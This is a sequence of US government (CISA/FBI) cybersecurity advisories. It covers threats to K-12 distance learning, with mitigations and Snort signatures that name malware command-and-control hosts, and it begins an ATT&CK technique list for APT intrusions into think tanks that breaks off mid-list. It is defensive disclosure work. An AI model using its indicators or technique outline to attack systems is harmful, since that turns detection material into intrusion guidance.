AzureAADPowerShellAnomaly.yaml</a></li> <li><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml">[5] GitHub: Azure / Azure-Sentinel - ADFSDomainTrustMods.yaml</a></li> </ul> <h3>Revisions</h3> <ul> <li>Initial Version: December 17, 2020</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
2020. december 10.

AA20-345A: Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data

Original release date: December 10, 2020<br/><h3>Summary</h3><p>This Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).</p> <p>The FBI, CISA, and MS-ISAC assess malicious cyber actors are targeting kindergarten through twelfth grade (K-12) educational institutions, leading to ransomware attacks, the theft of data, and the disruption of distance learning services. Cyber actors likely view schools as targets of opportunity, and these types of attacks are expected to continue through the 2020/2021 academic year. These issues will be particularly challenging for K-12 schools that face resource limitations; therefore, educational leadership, information technology personnel, and security personnel will need to balance this risk when determining their cybersecurity investments.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-345A_Joint_Cybersecurity_Advisory_Distance_Learning_S508C.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><p>As of December 2020, the FBI, CISA, and MS-ISAC continue to receive reports from K-12 educational institutions about the disruption of distance learning efforts by cyber actors.</p> <h4>Ransomware</h4> <p>The FBI, CISA, and MS-ISAC have received numerous reports of ransomware attacks against K-12 educational institutions. In these attacks, malicious cyber actors target school computer systems, slowing access, and—in some instances—rendering the systems inaccessible for basic functions, including distance learning. Adopting tactics previously leveraged against business and industry, ransomware actors have also stolen—and threatened to leak—confidential student data to the public unless institutions pay a ransom.</p> <p>According to MS-ISAC data, the percentage of reported ransomware incidents against K-12 schools increased at the beginning of the 2020 school year. In August and September, 57% of ransomware incidents reported to the MS-ISAC involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July.</p> <p>The five most common ransomware variants identified in incidents targeting K-12 schools between January and September 2020—based on open source information as well as victim and third-party incident reports made to MS-ISAC—are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil.</p> <h4>Malware</h4> <p>Figure 1 identifies the top 10 malware strains that have affected state, local, tribal, and territorial (SLTT) educational institutions over the past year (up to and including September 2020). Note: These malware variants are purely opportunistic as they not only affect educational institutions but other organizations as well.</p> <p>ZeuS and Shlayer are among the most prevalent malware affecting K-12 schools.</p> <ul> <li>ZeuS is a Trojan with several variants that targets Microsoft Windows operating systems. Cyber actors use ZeuS to infect target machines and send stolen information to command-and-control servers.</li> <li>Shlayer is a Trojan downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malicious advertising posing as a fake Adobe Flash updater. <strong>Note: </strong>Shlayer is the only malware of the top 10 that targets MacOS; the other 9 affect Microsoft Windows operating systems</li> </ul> <p class="text-align-center"><img alt="" data-entity-type="file" data-entity-uuid="ee5aa08d-fe73-44e6-8f7d-4b5e6ac08320" height="275" src="https://us-cert.cisa.gov/sites/default/files/publications/Top%2010%20Malware%20-%20K-12.png" width="614" /></p> <p class="text-align-center"><cite>Figure 1: Top 10 malware affecting SLTT educational institutions</cite></p> <h4><cite>&nbsp;</cite><br /> Distributed Denial-of-Service Attacks</h4> <p>Cyber actors are causing disruptions to K-12 educational institutions—including third-party services supporting distance learning—with distributed denial-of-service (DDoS) attacks,&nbsp; which temporarily limit or prevent users from conducting daily operations. The availability of DDoS-for-hire services provides opportunities for any motivated malicious cyber actor to conduct disruptive attacks regardless of experience level. <strong>Note:</strong> DDoS attacks overwhelm servers with a high level of internet traffic originating from many different sources, making it impossible to mitigate at a single source.</p> <h4>Video Conference Disruptions</h4> <p>Numerous reports received by the FBI, CISA, and MS-ISAC since March 2020 indicate uninvited users have disrupted live video-conferenced classroom sessions. These disruptions have included verbally harassing students and teachers, displaying pornography and/or violent images, and doxing meeting attendees (<strong>Note: </strong>doxing is the act of compiling or publishing personal information about an individual on the internet, typically with malicious intent). To enter classroom sessions, uninvited users have been observed:</p> <ul> <li>Using student names to trick hosts into accepting them into class sessions, and</li> <li>Accessing meetings from either publicly available links or links shared with outside users (e.g., students sharing links and/or passwords with friends).</li> </ul> <p>Video conference sessions without proper control measures risk disruption or compromise of classroom conversations and exposure of sensitive information.</p> <h3>Additional Risks and Vulnerabilities</h3> <p>In addition to the recent reporting of distance learning disruptions received by the FBI, CISA, and MS-ISAC, malicious cyber actors are expected to continue seeking opportunities to exploit the evolving remote learning environment.</p> <h4>Social Engineering</h4> <p>Cyber actors could apply social engineering methods against students, parents, faculty, IT personnel, or other individuals involved in distance learning. Tactics, such as phishing, trick victims into revealing personal information (e.g., password or bank account information) or performing a task (e.g., clicking on a link). In such scenarios, a victim could receive what appears to be legitimate email that:</p> <ul> <li>Requests personally identifiable information (PII) (e.g., full name, birthdate, student ID),</li> <li>Directs the user to confirm a password or personal identification number (PIN),</li> <li>Instructs the recipient to visit a website that is compromised by the cyber actor, or</li> <li>Contains an attachment with malware.</li> </ul> <p>Cyber actors also register web domains that are similar to legitimate websites in an attempt to capture individuals who mistype URLs or click on similar looking URLs. These types of attacks are referred to as domain spoofing or homograph attacks. For example, a user wanting to access <code>www.cottoncandyschool.edu</code> could mistakenly click on <code>www.cottencandyschool.edu</code> (changed “<code>o</code>” to an “<code>e</code>”) or <code>www.cottoncandyschoo1.edu</code> (changed letter “<code>l</code>” to a number “1”) (<strong>Note:</strong> this is a fictitious example to demonstrate how a user can mistakenly click and access a website without noticing subtle changes in website URLs). Victims believe they are on a legitimate website when, in reality, they are visiting a site controlled by a cyber actor.</p> <h4>Technology Vulnerabilities and Student Data</h4> <p>Whether as collateral for ransomware attacks or to sell on the dark web, cyber actors may seek to exploit the data-rich environment of student information in schools and education technology (edtech) services. The need for schools to rapidly transition to distance learning likely contributed to cybersecurity gaps, leaving schools vulnerable to attack. In addition, educational institutions that have outsourced their distance learning tools may have lost visibility into data security measures. Cyber actors could view the increased reliance on—and sharp usership growth in—these distance learning services and student data as lucrative targets.</p> <h4>Open/Exposed Ports</h4> <p>The FBI, CISA, and MS-ISAC frequently see malicious cyber actors exploiting exposed Remote Desktop Protocol (RDP) services to gain initial access to a network and, often, to manually deploy ransomware. For example, cyber actors will attack ports 445 (Server Message Block [SMB]) and 3389 (RDP) to gain network access. They are then positioned to move laterally throughout a network (often using SMB), escalate privileges, access and exfiltrate sensitive information, harvest credentials, or deploy a wide variety of malware. This popular attack vector allows cyber actors to maintain a low profile, as they are using a legitimate network service that provides them with the same functionality as any other remote user.</p> <h4>End-of-Life Software</h4> <p>End-of-Life (EOL) software is regularly exploited by cyber actors—often to gain initial access, deface websites, or further their reach in a network. Once a product reaches EOL, customers no longer receive security updates, technical support, or bug fixes. Unpatched and vulnerable servers are likely to be exploited by cyber actors, hindering an organization’s operational capacity.</p> <h3>Mitigations</h3><h4>Plans and Policies</h4> <p>The FBI and CISA encourage educational providers to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, institutions may be unable to continue teaching and administrative operations. Evaluating continuity and capability will help identify potential operational gaps. Through identifying and addressing these gaps, institutions can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. The FBI and CISA suggest K-12 educational institutions review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by cyber actors.</p> <h4>Network Best Practices</h4> <ul> <li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li> <li>Check configurations for every operating system version for educational institution-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.</li> <li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li> <li>Use multi-factor authentication where possible.</li> <li>Disable unused remote access/RDP ports and monitor remote access/RDP logs.</li> <li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li> <li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li> <li>Audit logs to ensure new accounts are legitimate.</li> <li>Scan for open or listening ports and mediate those that are not needed.</li> <li>Identify critical assets such as student database servers and distance learning infrastructure; create backups of these systems and house the backups offline from the network.</li> <li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li> <li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li> </ul> <h4>User Awareness Best Practices</h4> <ul> <li>Focus on awareness and training. Because end users are targeted, make employees and students aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li> <li>Ensure employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li> <li>Monitor privacy settings and information available on social networking sites.</li> </ul> <h4>Ransomware Best Practices</h4> <p>The FBI and CISA do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, regardless of whether your organization decided to pay the ransom, the FBI urges you to report ransomware incidents to your local FBI field office. Doing so provides the FBI with the critical information they need to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. law.</p> <p>In addition to implementing the above network best practices, the FBI and CISA also recommend the following:</p> <ul> <li>Regularly back up data, air gap, and password protect backup copies offline.</li> <li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li> </ul> <h4>Denial-of-Service Best Practices</h4> <ul> <li>Consider enrolling in a denial-of-service mitigation service that detects abnormal traffic flows and redirects traffic away from your network.</li> <li>Create a partnership with your local internet service provider (ISP) prior to an event and work with your ISP to control network traffic attacking your network during an event.</li> <li>Configure network firewalls to block unauthorized IP addresses and disable port forwarding.</li> </ul> <h4>Video-Conferencing Best Practices</h4> <ul> <li>Ensure participants use the most updated version of remote access/meeting applications.</li> <li>Require passwords for session access.</li> <li>Encourage students to avoid sharing passwords or meeting codes.</li> <li>Establish a vetting process to identify participants as they arrive, such as a waiting room.</li> <li>Establish policies to require participants to sign in using true names rather than aliases.</li> <li>Ensure only the host controls screensharing privileges.</li> <li>Implement a policy to prevent participants from entering rooms prior to host arrival and to prevent the host from exiting prior to the departure of all participants.</li> </ul> <h4>Edtech Implementation Considerations</h4> <ul> <li>When partnering with third-party and edtech services to support distance learning, educational institutions should consider the following:</li> <li>The service provider’s cybersecurity policies and response plan in the event of a breach and their remediation practices: <ul> <li>How did the service provider resolve past cyber incidents? How did their cybersecurity practices change after these incidents?</li> </ul> </li> <li>The provider’s data security practices for their products and services (e.g., data encryption in transit and at rest, security audits, security training of staff, audit logs);</li> <li>The provider’s data maintenance and storage practices (e.g., use of company servers, cloud storage, or third-party services);</li> <li>Types of student data the provider collects and tracks (e.g., PII, academic, disciplinary, medical, biometric, IP addresses);</li> <li>Entities to whom the provider will grant access to the student data (e.g., vendors);</li> <li>How the provider will use student data (e.g., will they sell it to—or share it with—third parties for service enhancement, new product development, studies, marketing/advertising?);</li> <li>The provider’s de-identification practices for student data; and</li> <li>The provider’s policies on data retention and deletion.</li> </ul> <h4>Malware Defense</h4> <p>Table 1 identifies CISA-created Snort signatures, which have been successfully used to detect and defend against related attacks, for the malware variants listed below. <strong>Note:</strong> the listing is not fully comprehensive and should not be used at the exclusion of other detection methods.</p> <p class="text-align-center"><em>Table 1: Malware signatures</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;"> <thead> <tr> <th scope="col" style="width: 198px;"><strong>Malware</strong></th> <th scope="col" style="width: 356px;">Signature</th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 198px; text-align: left;"><strong>NanoCore</strong></td> <td scope="col" style="width: 356px; text-align: left;"><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"NANOCORE:HTTP GET URI contains 'FAD00979338'"; sid:00000000; rev:1; flow:established,to_server; content:"GET"; http_method; content:"getPluginName.php?PluginID=FAD00979338"; fast_pattern; http_uri; classtype:http-uri; metadata:service http;)&nbsp;</code></td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"> <p><strong>Cerber</strong></p> </td> <td scope="col" style="width: 356px; text-align: left;"><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|polkiuj.top'"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,&lt;unique_ID&gt;.tagged; content:"host|3a 20|polkiuj.top|0d 0a|"; http_header; fast_pattern:only; flowbits:set,&lt;unique_ID&gt;.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)&nbsp;</code></td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"><strong>Kovter</strong></td> <td scope="col" style="width: 356px; text-align: left;"><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"Kovter:HTTP URI POST to CnC Server"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,&lt;unique_ID&gt;.tagged; content:"POST / HTTP/1.1"; depth:15; content:"Content-Type|3a 20|application/x-www-form-urlencoded"; http_header; depth:47; fast_pattern; content:"User-Agent|3a 20|Mozilla/"; http_header; content:!"LOADCURRENCY"; nocase; content:!"Accept"; http_header; content:!"Referer|3a|"; http_header; content:!"Cookie|3a|"; nocase; http_header; pcre:"/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$/P"; pcre:"/User-Agent\x3a[^\r\n]+\r\nHost\x3a\x20(?:\d{1,3}\.){3}\d{1,3}\r\nContent-Length\x3a\x20[1-5][0-9]{2,3}\r\n(?:Cache-Control|Pragma)\x3a[^\r\n]+\r\n(?:\r\n)?$/H"; flowbits:set,&lt;unique_ID&gt;.tagged; tag:session,10,packets; classtype:nonstd-tcp; metadata:service http;)</code></td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"><strong>Dridex</strong></td> <td scope="col" style="width: 356px; text-align: left;"> <p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"HTTP URI GET contains 'invoice_########.doc' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; content:"invoice_"; http_uri; fast_pattern:only; content:".doc"; nocase; distance:8; within:4; content:"GET"; nocase; http_method; classtype:http-uri; metadata:service http;)<br /> alert tcp any any -&gt; any $HTTP_PORTS (msg:"HTTP Client Header contains 'Host|3a 20|tanevengledrep ru' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,&lt;unique_ID&gt;.tagged; content:"Host|3a 20|tanevengledrep|2e|ru|0d 0a|"; http_header; fast_pattern:only; flowbits:set,&lt;unique_ID&gt;.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)</code></p> </td> </tr> </tbody> </table> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting organization; and a designated point of contact.</p> <p>To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto:Central@cisa.gov">Central@cisa.gov</a>.</p> <h3>Resources</h3> <p>MS-ISAC membership is open to employees or representatives from all public K-12 education entities in the United States. The MS-ISAC provides multiple cybersecurity services and benefits to help K-12 education entities increase their cybersecurity posture. To join, visit <a href="https://learn.cisecurity.org/ms-isac-registration">https://learn.cisecurity.org/ms-isac-registration</a>.</p> <ul> <li><a href="https://www.cisa.gov/telework">CISA Telework Guidance and Resources</a></li> <li><a href="https://www.cisa.gov/publication/secure-video-conferencing-schools">CISA Cybersecurity Recommendations and Tips for Schools Using Video Conferencing</a></li> <li><a href="https://us-cert.cisa.gov/Ransomware">CISA Ransomware Publications</a></li> <li><a href="https://www.cisa.gov/emergency-services-sector-continuity-planning-suite">CISA Emergency Services Sector Continuity Planning Suite</a></li> <li><a href="https://www.cisa.gov/publication/ransomware-guide">CISA-MS-ISAC Joint Ransomware Guide</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href="https://www.us-cert.gov/ncas/tips/ST04-006">CISA Tip: Understanding Patches</a></li> <li><a href="https://cyber.org/cybersafety">CISA and CYBER.ORG “Cyber Safety Video Series” for K-12 students and educators</a></li> <li><a href="https://www.ic3.gov/media/2019/191002.aspx">FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations</a></li> </ul> <p><strong>Note: </strong>contact your local FBI field office (<a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>) for additional FBI products on ransomware, edtech, and cybersecurity for educational institutions.</p> <h3>Revisions</h3> <ul> <li>Initial Version: December 10, 2020</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
2020. december 1.

AA20-336A: Advanced Persistent Threat Actors Targeting U.S. Think Tanks

Original release date: December 1, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/techniques/enterprise/">ATT&amp;CK for Enterprise</a> for all referenced threat actor tactics and techniques.</em></p> <p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[<a href="https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/">1</a>] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.</p> <p>APT actors have relied on multiple avenues for initial access. These have included low-effort capabilities such as spearphishing emails and third-party message services directed at both corporate and personal accounts, as well as exploiting vulnerable web-facing devices and remote connection capabilities. Increased telework during the COVID-19 pandemic has expanded workforce reliance on remote connectivity, affording malicious actors more opportunities to exploit those connections and to blend in with increased traffic. Attackers may leverage virtual private networks (VPNs) and other remote work tools to gain initial access or persistence on a victim’s network. When successful, these low-effort, high-reward approaches allow threat actors to steal sensitive information, acquire user credentials, and gain persistent access to victim networks.</p> <p>Given the importance that think tanks can have in shaping U.S. policy, CISA and FBI urge individuals and organizations in the international affairs and national security sectors to immediately adopt a heightened state of awareness and implement the critical steps listed in the Mitigations section of this Advisory.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><h4>ATT&amp;CK Profile</h4> <p>CISA created the following MITRE ATT&amp;CK profile to provide a non-exhaustive list of tactics, techniques, and procedures (TTPs) employed by APT actors to break through think tanks’ defenses, conduct reconnaissance in their environments, exfiltrate proprietary or confidential information, and execute effects on targets. These TTPs were included based upon closed reporting on APT actors that are known to target think tanks or based upon CISA incident response data.</p> <ul> <li><em><strong>Initial Access</strong></em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0001">TA0001</a>] <ul> <li><i>Valid Accounts </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/">T1078</a>]</li> <li><i>Valid Accounts: Cloud Accounts </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/004/">T1078.004</a>]</li> <li><i>External Remote Services </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1133/">T1133</a>]</li> <li><i>Drive-by Compromise</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1189">T1189</a>]</li> <li><i>Exploit Public-Facing Application</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190">T1190</a>] <ul> <li><i>Supply Chain Compromise: Compromise Software Supply Chain</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1195/002">T1195.002</a>]</li> <li><i>Trusted Relationship</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1199">T1199</a>]</li> <li><i>Phishing: Spearphishing Attachment</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001">T1566.001</a>]</li> <li><i>Phishing: Spearphishing Link</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002">T1566.002</a>]</li> <li><i>Phishing: Spearphishing via Service</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/003">T1566.003</a>]</li> </ul> </li> </ul> </li> <li><i><em><strong>Execution</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0002">TA0002</a>] <ul> <li><i>Windows Management Instrumentation </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1047">T1047</a>]</li> <li><i>Scheduled Task/Job: Scheduled Task </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005">T1053.005</a>]</li> <li><i>Command and Scripting Interpreter: PowerShell </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/001">T1059.001</a>]</li> <li><i>Command and Scripting Interpreter: Windows Command Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/003">T1059.003</a>]</li> <li><i>Command and Scripting Interpreter: Unix Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/004">T1059.004</a>]</li> <li><i>Command and Scripting Interpreter: Visual Basic </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/005">T1059.005</a>]</li> <li><i>Command and Scripting Interpreter: Python </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/006">T1059.006</a>]</li> <li><i>Native API </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1106">T1106</a>]</li> <li><i>Exploitation for Client Execution</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1203">T1203</a>]</li> <li><i>User Execution: Malicious Link </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1204/001">T1204.001</a>]</li> <li><i>User Execution: Malicious File</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002">T1204.002</a>]</li> <li><i>Inter-Process Communication: Dynamic Data Exchange </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1559/002/">T1559.002</a>]</li> <li><i>System Services: Service Execution </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1569/002">T1569.002</a>]</li> </ul> </li> <li><i><em><strong>Persistence</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003">TA0003</a>] <ul> <li><i>Boot or Logon Initialization Scripts: Logon Script (Windows)</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1037/001">T1037.001</a>]</li> <li><i>Scheduled Task/Job: Scheduled Task</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005">T1053.005</a>]</li> <li><i>Account Manipulation: Exchange Email Delegate Permissions </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1098/002">T1098.002</a>]</li> <li><i>Create Account: Local Account</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1136/001">T1136.001</a>]</li> <li><i>Office Application Startup: Office Test </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1137/002">T1137.002</a>]</li> <li><i>Office Application Startup: Outlook Home Page</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1137/004">T1137.004</a>]</li> <li><i>Browser Extensions</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1176">T1176</a>]</li> <li><i>BITS Jobs</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1197/">T1197</a>]</li> <li><i>Server Software Component: Web Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1505/003">T1505.003</a>]</li> <li><i>Pre-OS Boot: Bootkit</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1542/003/">T1542.003</a>]</li> <li><i>Create or Modify System Process: Windows Service</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1543/003">T1543.003</a>]</li> <li><i>Event Triggered Execution: Change Default File Association</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/001">T1546.001</a>]</li> <li><i>Event Triggered Execution: Windows Management Instrumentation Event Subscription </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1546/003">T1546.003</a>]</li> <li><i>Event Triggered Execution: Accessibility Features</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008">T1546.008</a>]</li> <li><i>Event Triggered Execution: Component Object Model Hijacking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/015">T1546.015</a>]</li> <li><i>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001">T1547.001</a>]</li> <li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/009">T1547.009</a>]</li> </ul> </li> <li><i><em><strong>Privilege Escalation</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0004">TA0004</a>] <ul> <li><i>Process Injection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055">T1055</a>]</li> <li><i>Process Injection: Process Hollowing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/012">T1055.012</a>]</li> <li><i>Exploitation for Privilege Escalation</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1068">T1068</a>]</li> <li><i>Access Token Manipulation: Token Impersonation/Theft</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1134/001">T1134.001</a>]</li> <li><i>Event Triggered Execution: Accessibility Features </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008">T1546.008</a>]</li> <li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/009">T1547.009</a>]</li> <li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1548/002">T1548.002</a>]</li> <li><i>Hijack Execution Flow: DLL Side-Loading</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1574/002">T1574.002</a>]</li> </ul> </li> <li><i><em><strong>Defense Evasion</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0005">TA0005</a>] <ul> <li><i>Rootkit</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1014">T1014</a>]</li> <li><i>Obfuscated Files or Information: Binary Padding </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/001">T1027.001</a>]</li> <li><i>Obfuscated Files or Information: Software Packing </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/002">T1027.002</a>]</li> <li><i>Obfuscated Files or Information: Steganography</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/003">T1027.003</a>]</li> <li><i>Obfuscated Files or Information: Indicator Removal from Tools</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/005">T1027.005</a>]</li> <li><i>Masquerading: Match Legitimate Name or Location</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1036/005">T1036.005</a>]</li> <li><i>Indicator Removal on Host: Clear Windows Event Logs</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/001">T1070.001</a>]</li> <li><i>Indicator Removal on Host: Clear Command History</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/003">1070.003</a>]</li> <li><i>Indicator Removal on Host: File Deletion</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/004">T1070.004</a>]</li> <li><i>Indicator Removal on Host: Timestomp</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/006">T1070.006</a>]</li> <li><i>Modify Registry</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1112">T1112</a>]</li> <li><i>Deobfuscate/Decode Files or Information </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1140">T1140</a>]</li> <li><i>Exploitation for Defense Evasion</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1211">T1211</a>]</li> <li><i>Signed Binary Proxy Execution: Compiled HTML File</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/001">T1218.001</a>]</li> <li><i><em>Signed Binary Proxy Execution: Mshta</em></i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/005">T1218.005</a>]</li> <li><i>Signed Binary Proxy Execution:<em> Rundll32 </em></i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1218/011">T1218.011</a>]</li> <li><i>Template Injection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1221">T1221</a>]</li> <li><i>Execution Guardrails: Environmental Keying</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1480/001">T1480.001</a>]</li> <li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1548/002">T1548.002</a>]</li> <li><i>Use Alternate Authentication Material: Application Access Token</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1550/001">T1550.001</a>]</li> <li><i>Subvert Trust Controls: Code Signing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1553/002">T1553.002</a>]</li> <li><i>Impair Defenses: Disable or Modify Tools</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/001">T1562.001</a>]</li> <li><i>Impair Defenses: Disable or Modify System Firewall</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/004">T1562.004</a>]</li> <li><i>Hide 